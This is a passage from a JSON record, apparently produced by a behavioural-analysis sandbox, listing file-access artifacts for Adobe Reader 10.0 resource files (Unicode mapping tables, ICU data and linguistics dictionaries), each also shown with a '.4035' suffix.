(x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1258.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1258.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1258.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP874.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp874.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP874.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp874.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP932.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp932.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP932.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp932.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP936.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp936.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP936.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp936.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP949.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp949.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP949.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp949.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP950.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp950.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP950.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp950.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ARABIC.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\arabic.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ARABIC.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\arabic.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CENTEURO.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\centeuro.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CENTEURO.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\centeuro.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINSIMP.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chinsimp.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINSIMP.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chinsimp.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINTRAD.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chintrad.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CHINTRAD.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\chintrad.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CORPCHAR.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\corpchar.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CORPCHAR.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\corpchar.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CROATIAN.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\croatian.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CROATIAN.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\croatian.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CYRILLIC.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\cyrillic.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\CYRILLIC.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\cyrillic.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\FARSI.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\farsi.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\FARSI.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\farsi.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\GREEK.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\greek.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\GREEK.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\greek.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\HEBREW.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\hebrew.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\HEBREW.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\hebrew.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ICELAND.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\iceland.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ICELAND.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\iceland.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\JAPANESE.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\japanese.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\JAPANESE.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\japanese.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\KOREAN.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\korean.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\KOREAN.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\korean.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMAN.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\roman.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMAN.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\roman.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMANIAN.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\romanian.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\ROMANIAN.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\romanian.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\SYMBOL.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\symbol.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\SYMBOL.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\symbol.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\THAI.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\thai.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\THAI.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\thai.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\TURKISH.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\turkish.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\TURKISH.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\turkish.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\UKRAINE.TXT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\ukraine.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\UKRAINE.TXT", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\ukraine.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\HKSCS.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\hkscs.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\HKSCS.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\hkscs.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\Japanese83pv.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\japanese83pv.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\Japanese83pv.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\japanese83pv.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0208.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0208.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0208.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0208.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0213.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0213.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0213.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0213.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\symbol.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\symbol.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\symbol.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\symbol.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\zdingbat.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\zdingbat.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\zdingbat.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\zdingbat.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\icudt26l.dat.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\icudt26l.dat.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\icudt26l.dat", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\icudt26l.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\SaslPrepProfile_norm_bidi.spp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\saslprep\\saslprepprofile_norm_bidi.spp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\SaslPrepProfile_norm_bidi.spp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\saslprep\\saslprepprofile_norm_bidi.spp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ara131.lex.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ara131.lex.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ara131.lex", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ara131.lex", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ara32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ara32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ara32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ara32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\araphon.env.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\araphon.env.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\araphon.env", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\araphon.env", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt04.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt04.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt04.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt04.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt55.ths.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt55.ths.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt55.ths", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt55.ths", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brz.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brz.hyp", "hashes": [], "norm_filename": "c:\\program files 